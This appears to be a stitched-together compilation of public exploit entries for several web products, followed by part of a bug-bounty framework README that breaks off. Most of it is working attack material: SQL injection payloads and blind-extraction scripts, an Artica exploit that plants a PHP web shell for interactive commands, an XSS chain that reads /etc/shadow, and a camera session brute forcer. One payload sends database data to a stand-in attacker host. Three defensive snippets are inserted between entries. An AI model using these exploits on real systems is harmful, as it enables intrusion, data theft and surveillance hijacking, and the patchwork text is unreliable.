source: https://www.securityfocus.com/bid/69307/info
ArticleFR is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ArticleFR 3.0.4 is vulnerable; prior versions may also be affected.
http://www.example.com/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202
# # # # #
# Vulnerability: Improper Access Restrictions
# Date: 15.01.2017
# Vendor Homepage: http://www.e-soft24.com/
# Script Name: Article Directory Script Seo
# Script Version: V3.2
# Script Buy Now: http://www.e-soft24.com/article-directory-script-seo-p-338.html
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/alldoc.php
# http://localhost/[PATH]/admin/editdoc.php
# http://localhost/[PATH]/admin/editdoc.php?doc_id=1
# etc.
# # # # #
# # # # #
# Exploit Title: Article Directory Script 3.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.yourarticlesdirectory.com/
# Software Link: http://www.yourarticlesdirectory.com/
# Demo: http://www.yourarticlesdirectory.com/livedemo.php
# Version: 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15960
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands.
#
# Proof of Concept:
#
# http://localhost/[PATH]/category.php?id=[SQL]
#
# 18++/*!02222UniOn*/+(/*!02222SeleCt*/+0x283129,/*!02222CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,0x283429,0x3078323833353239)--+-
#
# http://localhost/[PATH]/author.php?id=[SQL]
#
# Parameter: id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: id=18 AND 8646=8646
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: id=18 AND SLEEP(5)
#
# Parameter: id (GET)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: id=27 AND SLEEP(5)
#
# Etc..
# # # # #
[+] Credits: John Page (aka Hyp3rlinX)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ARTICA-WEB-PROXY-v3.06-REMOTE-CODE-EXECUTION-CVE-2017-17055.txt
[+] ISR: ApparitionSec
Vendor:
=======
www.articatech.com
Product:
=========
Artica Web Proxy v.3.06.112216
Artica Tech offers a powerful but easy-to-use Enterprise-Class Web Security and Control solution,
usually the preserve of large companies. ARTICA PROXY Solutions have been developed over the past
10 years as an Open Source Project to help SMEs and public bodies protect both their organizations
and employees from risks posed by the Internet.
Vulnerability Type:
===================
Remote Code Execution
CVE Reference:
==============
CVE-2017-17055
Security Issue:
================
Artica offers a web based command line emulator 'system.terminal.php' (shell), allowing authenticated users to execute OS commands as root.
However, Artica fails to sanitize the HTTP request parameter $_GET["username-form-id"] used in 'freeradius.users.php'.
Therefore, an authenticated user who clicks an attacker-supplied link or visits a malicious web page can end up executing attacker-supplied
JavaScript code, which is then used to execute unauthorized operating system commands (RCE) on the affected Artica Web Proxy server
by abusing the system.terminal.php functionality. The result is attacker takeover of the Artica server.
Exploit/POC:
=============
1) Steal artica Server "/etc/shadow" password file.
https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=cat%20/etc/shadow%27);%3C%2Fscript%3E%3Cscript%3E
2) Write file 'PWN' to /tmp dir.
https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=touch%20/tmp/PWN%27);%3C%2Fscript%3E%3Cscript%3E
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: November 28, 2017
Vendor Confirms Vulnerability : November 28, 2017
Vendor Reply "Fixed in 3.06.112911 / ISO released" : November 29, 2017
December 1, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
# Exploit Title: Artica Proxy 4.50 - Remote Code Execution (RCE)
# Date: 23-04-2024
# Exploit Author: Madan
# Vendor Homepage: https://artica-proxy.com/
# Version: 4.40, 4.50
# Tested on: [relevant os]
# CVE : CVE-2024-2054
you can also find the exploit on my github repo:
https://github.com/Madan301/CVE-2024-2054
import requests
import base64
import urllib3
from colorama import Fore

print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might "
      "sometimes vary from how artica proxy interface is hosted")
URL = input("Enter url: ")
if URL[-1] == "/":
    ACTUAL_URL = URL[:-1]
else:
    ACTUAL_URL = URL
ARTICA_URL = ACTUAL_URL


def check(ARTICA_URL):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    try:
        check = requests.get(ARTICA_URL + '/wizard/wiz.upload.php', verify=False)
    except Exception:
        print(Fore.RED + "Could not reach, check URL")
        return False
    if check.status_code == 200:
        print(Fore.GREEN + "Vulnerable")
        return True
    else:
        print(Fore.RED + "Not Vulnerable")
        return False


def exploit(ARTICA_URL):
    payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
    payload_data = {
        "TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
            "cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
            "cache_serializer": "json",
            "cache_size": 999999999,
            "cache_data": {
                payload: {
                    "cache_date": 0,
                    "ttl": 999999999
                }
            }
        }
    }
    while True:
        PAYLOAD_CMD = input("enter command: ")
        url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
        response = requests.get(url, verify=False)
        if response.status_code == 200:
            cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
            cmd_response = requests.get(cmd_url, verify=False)
            print(cmd_response.text)
        else:
            print("Failed to execute the payload")


check = check(ARTICA_URL=ACTUAL_URL)
if check == True:
    exploit(ARTICA_URL=ARTICA_URL)
# Exploit Title: Artica Proxy 4.3.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-08-13
# Exploit Author: Dan Duffy
# Vendor Homepage: http://articatech.net/
# Software Link: http://articatech.net/download2x.php?IsoOnly=yes
# Version: 4.30.00000000 (REQUIRED)
# Tested on: Debian
# CVE : CVE-2020-17506
import requests
import argparse
from bs4 import BeautifulSoup


def bypass_auth(session, args):
    login_endpoint = "/fw.login.php?apikey="
    payload = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
    print("[+] Bypassing authentication...")
    session.get(args.host + login_endpoint + payload, verify=False)
    return session


def run_command(session, args):
    cmd_endpoint = "/cyrus.index.php?service-cmds-peform=||{}||".format(args.command)
    print("[+] Running command: {}".format(args.command))
    response = session.post(args.host + cmd_endpoint, verify=False)
    soup = BeautifulSoup(response.text, "html.parser")
    print(soup.find_all("code")[1].get_text())


def main():
    parser = argparse.ArgumentParser(description="CVE-2020-17506 Artica PoC.")
    parser.add_argument(
        "--host", help="The host to target. Format example: https://host:port",
    )
    parser.add_argument("--command", help="The command to run")
    args = parser.parse_args()
    if not args.host or not args.command:
        parser.print_help()
        exit(0)
    session = requests.Session()
    session = bypass_auth(session, args)
    run_command(session, args)


if __name__ == "__main__":
    main()
# Exploit Title: Artha The Open Thesaurus 1.0.3.0 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://artha.sourceforge.net
# Software Link: https://netcologne.dl.sourceforge.net/project/artha/artha/1.0.3/artha_1.0.3.0.exe
# Version: 1.0.3.0
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Query / Search
#!/usr/bin/python
buffer = "A" * 256
payload = buffer
try:
    f = open("exp.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except IOError:
    print("File cannot be created.")
# Exploit Title: Arteco Web Client DVR/NVR - 'SessionId' Brute Force
# Date: 16.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.arteco-global.com
#!/usr/bin/env python3
#
#
# Arteco Web Client DVR/NVR 'SessionId' Cookie Brute Force Session Hijacking Exploit
#
#
# Vendor: Arteco S.U.R.L.
# Product web page: https://www.arteco-global.com
# Affected version: n/a
#
# Summary: Arteco DVR/NVR is a mountable industrial surveillance server
# ideal for those who need to manage IP video surveillance designed for
# medium to large installations that require high performance and reliability.
# Arteco can handle IP video sources from all major international manufacturers
# and is compatible with ONVIF and RTSP devices.
#
# Desc: The Session ID 'SessionId' is of an insufficient length and can be
# exploited by brute force, which may allow a remote attacker to obtain a
# valid session, bypass authentication and disclose the live camera stream.
#
# Tested on: Microsoft Windows 10 Enterprise
# Apache/2.4.39 (Win64) OpenSSL/1.0.2s
# Apache/2.2.29 (Win32) mod_fastcgi/2.4.6 mod_ssl/2.2.29 OpenSSL/1.0.1m
# Arteco-Server
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5613
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5613.php
#
#
# 16.11.2020
#
import sys,requests
class BrutusCookius:
    def __init__(self):
        self.validate = None
        self.cookies = None
        self.params = None
        self.stream = None
        self.path = None
        self.cgi = None
        self.ip = None
        self.op = None

    def check(self):
        print('Usage: ./arteco.py IP')
        exit(9)

    def bro(self):
        if len(sys.argv) != 2:
            self.check()
        else:
            self.ip = sys.argv[1]
            print('[+] Target IP: ' + self.ip)
            if not 'http' in self.ip:
                self.ip = 'http://{}'.format(self.ip)

    def force(self):
        # Check the Set-Cookie on the target and determine the length (varies per model/version)
        # Cookie: SessionId=15800 - range(10000,100000)
        # Cookie: SessionId=8350 - range(1000,10000)
        # Cookie: SessionId=502 - range(100,1000)
        self.op = range(17129, 17149)  # Tweak
        for j in self.op:
            session = requests.session()
            self.cookies = dict(SessionId=str(j))
            sys.stdout.write('[+] Trying ID: ' + str(j))
            self.path = '/arteco-mobile/'
            self.cgi = 'camera.fcgi'
            self.params = '?serverId=1&camera=2&mode=1&szx=5&szy=5&qty=15&fps=1'
            self.validate = session.get(self.ip + self.path + self.cgi + self.params, cookies=self.cookies).headers
            if not 'artecomobile' in str(self.validate):
                print(' - NOPE.')
            else:
                print(' - BINGO!!!')
                print('[+] Active session found: ' + str(j))
                print('[+] Use the cookie: SessionId=' + str(j))
                exit(9)
        print('[!] Sorry, no valid session found.')

    def main(self):
        self.bro()
        self.force()


if __name__ == '__main__':
    BrutusCookius().main()
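The defender's view of the Arteco finding above, as an added example that is not part of the advisory or of Arteco's software: the numeric SessionId ranges quoted in the script give only a handful of bits to guess, the guessing itself shows up in access logs as one client presenting many different SessionId cookies to camera.fcgi in a short window, and a CSPRNG token is the replacement. The log lines, the log format (Cookie header appended as the last quoted field) and the HTTP status values are constructed for the example.

```python
import math
import re
import secrets
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: Apache-style access log with the request's Cookie header
# appended as a final quoted field (LogFormat "... \"%{Cookie}i\""). One client
# walks consecutive SessionId values against camera.fcgi; the other is a normal user.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Nov/2020:10:00:01 +0000] "GET /arteco-mobile/camera.fcgi?serverId=1&camera=2&mode=1 HTTP/1.1" 401 0 "-" "python-requests/2.24.0" "SessionId=17129"
203.0.113.7 - - [16/Nov/2020:10:00:02 +0000] "GET /arteco-mobile/camera.fcgi?serverId=1&camera=2&mode=1 HTTP/1.1" 401 0 "-" "python-requests/2.24.0" "SessionId=17130"
203.0.113.7 - - [16/Nov/2020:10:00:02 +0000] "GET /arteco-mobile/camera.fcgi?serverId=1&camera=2&mode=1 HTTP/1.1" 401 0 "-" "python-requests/2.24.0" "SessionId=17131"
203.0.113.7 - - [16/Nov/2020:10:00:03 +0000] "GET /arteco-mobile/camera.fcgi?serverId=1&camera=2&mode=1 HTTP/1.1" 401 0 "-" "python-requests/2.24.0" "SessionId=17132"
203.0.113.7 - - [16/Nov/2020:10:00:04 +0000] "GET /arteco-mobile/camera.fcgi?serverId=1&camera=2&mode=1 HTTP/1.1" 401 0 "-" "python-requests/2.24.0" "SessionId=17133"
203.0.113.7 - - [16/Nov/2020:10:00:04 +0000] "GET /arteco-mobile/camera.fcgi?serverId=1&camera=2&mode=1 HTTP/1.1" 200 5120 "-" "python-requests/2.24.0" "SessionId=17134"
198.51.100.2 - - [16/Nov/2020:10:00:05 +0000] "GET /arteco-mobile/camera.fcgi?serverId=1&camera=1&mode=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "SessionId=17140"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<cookie>[^"]*)"$'
)
SID_RE = re.compile(r'(?:^|;\s*)SessionId=(\d+)')


def parse_line(line):
    """Split one access-log line into its fields; None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    sid = SID_RE.search(m['cookie'])
    return {
        'ip': m['ip'],
        'ts': datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z'),
        'path': m['path'],
        'status': int(m['status']),
        'sid': sid.group(1) if sid else None,
    }


def detect_session_guessing(lines, window=timedelta(seconds=60), threshold=5):
    """Return {ip: distinct SessionId count} for clients that presented at least
    `threshold` different SessionId cookies to camera.fcgi within `window`.
    A real user holds one session; cycling through many is the brute-force signature."""
    events = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev['sid'] and ev['path'].startswith('/arteco-mobile/camera.fcgi'):
            events[ev['ip']].append((ev['ts'], ev['sid']))
    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        best = 0
        for i, (t0, _) in enumerate(evs):       # sliding window anchored at each request
            seen = {sid for t, sid in evs[i:] if t - t0 <= window}
            best = max(best, len(seen))
        if best >= threshold:
            flagged[ip] = best
    return flagged


def id_space_bits(lo, hi):
    """Bits of entropy in a SessionId drawn from range(lo, hi); range(10000,100000) is ~16.5 bits."""
    return math.log2(hi - lo)


def random_session_id():
    """Replacement token: 32 bytes (256 bits) from the OS CSPRNG, not a counter."""
    return secrets.token_urlsafe(32)


if __name__ == '__main__':
    print('flagged:', detect_session_guessing(SAMPLE_LOG.splitlines()))
    print('bits to guess for range(10000,100000): %.1f' % id_space_bits(10000, 100000))
    print('example replacement token:', random_session_id())
```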
# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on: XAMPP / Windows 10
# CVE : CVE-2023-23163
# Proof of Concept:
# 1- Install the application Art Gallery Management System Project v1.0
# 2- Navigate to the admin login page and log in with the valid username and password <admin:Test@123>.
URL: http://localhost/Art-Gallery-MS-PHP/admin/login.php
# 3- Now navigate to "Manage ART TYPE" by clicking on the "ART TYPE" option in the left sidebar.
# 4- Now click on the "Edit" button of any Art Type and you will be redirected to the edit page of that art type.
# 5- Now insert a single quote ( ' ) into the "editid" parameter to break the database query; you will see that the output is not shown.
# 6- Now inject the payload double single quote ('') into the "editid" parameter to make the database query valid again; after sending this request the SQL query is performed successfully and the product is shown in the output.
# 7- Now find how many columns are returned by the SQL query. This query returns 6 columns.
Payload:editid=6%27order%20by%203%20--%20-
# 8- To manually get data from the database, insert the payload below to see the user of the database.
payload: editid=-6%27union%20all%20select%201,user(),3--%20-
# 9- Now to get all database data, use the "sqlmap" command below to fetch all the data.
Command: sqlmap http://localhost/Art-Gallery-MS-PHP/admin/edit-art-type-detail.php?editid=6 --cookie="PHPSESSID=hub8pub9s5c1j18cva9594af3q" --dump-all --batch
# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on: XAMPP / Windows 10
# CVE : CVE-2023-23162
# Proof of Concept:
# 1- Install the application Art Gallery Management System Project v1.0
# 2- Navigate to the product page by clicking on "ART TYPE" and selecting any of the categories in the menu.
# 3- Now insert a single quote ( ' ) into the "cid" parameter to break the database query; you will see that the output is not shown.
# 4- Now inject the payload double single quote ('') into the "cid" parameter to make the database query valid again; after sending this request the SQL query is performed successfully and the product is shown in the output.
# 5- Now find how many columns are returned by the SQL query. This query returns 6 columns.
Payload:cid=1%27order%20by%206%20--%20-&artname=Sculptures
# 6- To manually get data from the database, insert the payload below to see the user of the database.
payload: cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs
# 7- For automation using "sqlmap", intercept the request and copy it to a file called "request.txt".
# 8- Now to get all database data, use the "sqlmap" command below to fetch all the data.
Command: sqlmap -r request.txt -p cid --dump-all --batch
# Go to this url "https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs"
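What steps 5 to 7 of the two Art Gallery advisories above (editid and cid) actually exercise, and the hardened form, as an added example that is not code from the application or from the advisories: the injectable query pastes the parameter into the statement text, so a lone quote is a syntax error, a doubled quote repairs it, and "order by N" fails exactly when N exceeds the column count; the parameterised version validates the id and binds it, so the same inputs never reach the parser as SQL. The table, its column names and rows are constructed stand-ins (the page only says the query returns 6 columns), and SQLite replaces the MySQL backend.

```python
import sqlite3

# Constructed stand-in for the application's art-type table; the real schema is not
# on this page, only the fact that the vulnerable query returns 6 columns.
SCHEMA = """CREATE TABLE art_type (
    id INTEGER PRIMARY KEY, art_type TEXT, description TEXT,
    creation_date TEXT, updation_date TEXT, is_active INTEGER)"""
ROWS = [(6, "Sculptures", "three-dimensional works", "2023-01-20", None, 1),
        (7, "Prints", "editioned works on paper", "2023-01-20", None, 1)]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO art_type VALUES (?,?,?,?,?,?)", ROWS)
    return conn


def lookup_vulnerable(conn, editid):
    # Same construction as the injectable PHP: the request parameter is pasted into
    # the statement text, so quotes and comments inside it become SQL.
    return conn.execute(f"SELECT * FROM art_type WHERE id='{editid}'").fetchall()


def lookup_safe(conn, editid):
    # Hardened form: validate the shape first, then bind the value as a parameter
    # so the database never interprets it as statement text.
    if not editid.isdigit():
        return []
    return conn.execute("SELECT * FROM art_type WHERE id=?", (int(editid),)).fetchall()


def probe(conn, lookup, editid):
    """Run one lookup and report ('ok', rows) or ('error', message)."""
    try:
        return "ok", lookup(conn, editid)
    except sqlite3.Error as exc:
        return "error", str(exc)


# The inputs the advisories walk through: a lone quote breaks the statement, a doubled
# quote repairs it, and "order by N" succeeds only while N is within the column count.
PROBES = ["6", "6'", "6''", "6' order by 6 -- -", "6' order by 7 -- -"]


def compare(conn):
    """Outcome ('ok'/'error') of each probe against the vulnerable and the safe lookup."""
    return {p: (probe(conn, lookup_vulnerable, p)[0], probe(conn, lookup_safe, p)[0])
            for p in PROBES}


if __name__ == "__main__":
    c = make_db()
    for p, (vuln, safe) in compare(c).items():
        print(f"{p!r:24} vulnerable={vuln:5}  parameterised={safe}")
```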
# Exploit Title: Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on: XAMPP / Windows 10
# CVE : CVE-2023-23161
# Proof of Concept:
# 1- Install The application Art Gallery Management System Project v1.0
# 2- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=3&&artname=prints
# 3- Now Insert XSS Payload on artname parameter.
the XSS Payload: %3Cimg%20src=1%20onerror=alert(document.domain)%3E
# 4- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
# 5- XSS has been triggered.
# Go to this url "https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E" and the XSS will trigger.
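The two reflection contexts seen on this page, as an added example that is not code from either application: the Art Gallery artname parameter lands in the HTML body, where entity encoding is the fix, while the Artica username-form-id parameter lands inside a script element (which is why that payload opens with a closing script tag), where the value must be emitted as a JS string literal with "</" broken up. The templates and helper names are constructed for the example; only the two payloads come from the advisories.

```python
import html
import json

# The two reflected payloads from the advisories above, used here only as test input.
HTML_PAYLOAD = '<img src=1 onerror=alert(document.domain)>'   # artname, reflected into HTML body
JS_PAYLOAD = '</script><script>alert(1)</script><script>'      # username-form-id, reflected inside a script


def render_html_vulnerable(artname):
    # Reflection without encoding: the parameter is parsed as markup.
    return f'<h2>Art Type: {artname}</h2>'


def render_html_safe(artname):
    # Entity-encode for an HTML text (or quoted attribute) context.
    return f'<h2>Art Type: {html.escape(artname, quote=True)}</h2>'


def render_js_vulnerable(form_id):
    # Reflection inside a script element: a leading "</script>" ends the element
    # early and whatever follows is parsed as fresh markup.
    return f'<script>var formId = "{form_id}";</script>'


def js_string_literal(value):
    # json.dumps yields a valid JS string literal; "</" is additionally broken up because
    # the HTML tokenizer ends a script element at "</script" regardless of JS quoting.
    return json.dumps(value).replace('</', '<\\/')


def render_js_safe(form_id):
    return f'<script>var formId = {js_string_literal(form_id)};</script>'


def start_tag_count(markup, tag):
    """Number of <tag start tags the HTML tokenizer would see."""
    return markup.lower().count(f'<{tag}')


def script_close_count(markup):
    """Number of points at which the tokenizer would end a script element."""
    return markup.lower().count('</script')


if __name__ == '__main__':
    for label, out in (('html vulnerable', render_html_vulnerable(HTML_PAYLOAD)),
                       ('html safe      ', render_html_safe(HTML_PAYLOAD)),
                       ('js vulnerable  ', render_js_vulnerable(JS_PAYLOAD)),
                       ('js safe        ', render_js_safe(JS_PAYLOAD))):
        print(f'{label}: {out}')
```

In the Artica case the escaping removes the injection point, but the chained step (a POST to system.terminal.php from the victim's browser) is only closed off when that endpoint also demands a per-session CSRF token rather than trusting the cookie alone.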
# Exploit Title: Art Gallery Management System Project in PHP v 1.0 - SQL injection
# Date: 31-01-2023
# Exploit Author: Yogesh Verma
# Vendor Homepage: https://y0gesh-verma.github.io/
# Software Link: https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/, https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on: Windows/Linux
# CVE : CVE-2023-23156
#!/usr/bin/python
import sys
import requests

tmp = requests.Session()
db_name = ""

if len(sys.argv) == 2:
    url = sys.argv[1]
    # Boolean-based blind extraction: one character of database() at a time.
    for i in range(1, 7):
        for j in range(32, 126):
            sql_payload = f"'UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,(select*from(select (ascii(substr(database(),{i},1))={j}))a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL'"
            data = {'pid': '-1' + sql_payload}
            r = tmp.get(url, params=data)
            if "Dimension : 1" in r.text:
                db_name += chr(j)
                break
    if len(db_name) > 1:
        print('\n' + "Fetching current database :")
        print(db_name)
        print('\n' + "vulnerable to CVE-2023-23156")
    else:
        print("Not vulnerable to CVE-2023-23156")
else:
    print("Error: Please provide the URL as an argument.")
    print("Example: script.py https://example.com/single-product.php")
source: https://www.securityfocus.com/bid/48083/info
ARSC Really Simple Chat is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ARSC Really Simple Chat 3.3-rc2 is vulnerable; other versions may also be affected.
SQL injection:
http://www.example.com/base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202
http://www.example.com/base/admin/edit_layout.php?arsc_layout_id=-1%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
http://www.example.com/base/admin/edit_room.php?arsc_room=%27%20union%20select%201,2,version%28%29,4,5,6,7%20--%202
Cross-site Scripting:
http://www.example.com/base/dereferer.php?arsc_link=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Howdy! My name is Harrison Richardson, or rs0n (arson) when I want to feel cool. The code in this repository started as a small collection of scripts to help automate many of the common bug bounty hunting processes I found myself repeating. Over time, I built a simple web application with a MongoDB connection to manage my findings and identify valuable data points. After 5 years of bug bounty hunting, both part-time and full-time, I'm finally ready to package this collection of tools into a proper framework.
The Ars0n Framework is designed to provide aspiring application security engineers with all the tools they need to use bug bounty hunting as a means of learning valuable, real-world AppSec concepts, and to make money doing it! My goal is to lower the barrier to entry for bug bounty hunting by providing easy-to-use automation tools together with educational content for a wide range of web-based and cloud-based vulnerabilities. Combined with my YouTube content, this framework will help aspiring application security engineers quickly and easily understand real-world security concepts that translate directly into a well-paid career in cyber security.
In addition to using this tool for bug bounty hunting, aspiring engineers can also use this GitHub repository as a canvas to practice collaborating with other developers! The tool was inspired by Metasploit and is designed to be modular in a similar way. Each script (ex: wildfire.py or slowburn.py) is essentially an algorithm that runs modules (ex: fire-starter.py or fire-scanner.py) in a specific pattern to obtain a desired result. Because of this design, the community is free to build new scripts to solve a specific use case, or modules to expand the results of these scripts. By learning the code in this framework and using GitHub to contribute your own code, aspiring engineers will keep learning real-world skills that can be applied on the first day of a Security Engineer I position.
My hope is that this modular framework will act as a canvas to help share what I have learned over my career with the next generation of security engineers! Trust me, we need all the help we can get!
Quick Start
Paste this code block into a clean installation of Kali Linux 2023.4 to download, install, and run the latest stable alpha version of the framework:
sudo apt update && sudo apt-get update
sudo apt -y upgrade && sudo apt-get -y upgrade
wget https://github.com/r-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz
cd ars0n-framework
./install.sh
Download the latest stable alpha release
wget https://github.com/r-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz
Install
The Ars0n Framework includes a script that installs all the necessary tools, packages, etc. that are needed to run the framework on a clean installation of Kali Linux 2023.4.
Please note that the only supported installation of this framework is on a clean installation of Kali Linux 2023.3. If you choose to try to run the framework outside of a clean Kali install, I will not be able to help troubleshoot if you have any issues. ./install.sh This video shows exactly what to expect from a successful installation.
If you are using an ARM processor, you will need to add the --arm flag to all install/run scripts: ./install.sh --arm. When the installation begins, you will be prompted to enter various API keys and tokens. Entering these is not required to run the core functionality of the framework. If you do not enter these API keys and tokens at installation time, simply hit enter at each prompt. The keys can be added later to the ~/.keys directory. More information about how to add these keys manually can be found in the Frequently Asked Questions section of this README.
Running the Web Application (Client and Server)
Once the installation is complete, you will be given the option to run the application by entering Y. If you choose not to run the application at installation time, or if you need to run the application after a reboot, simply navigate to the root directory of the framework and run the run.sh bash script.
./run.sh If you are using an ARM processor, you will need to add the --arm flag to all install/run scripts: ./run.sh --arm
Core Modules
The Core Modules of the Ars0n Framework are used to determine the basic scanning logic. Each script is designed to support a specific reconnaissance methodology based on what the user is trying to accomplish.
Wildfire
Currently, the Wildfire script is the most widely used Core Module in the Ars0n Framework. The purpose of this module is to allow the user to scan multiple targets that allow testing on any subdomain discovered by the researcher.
How it works:
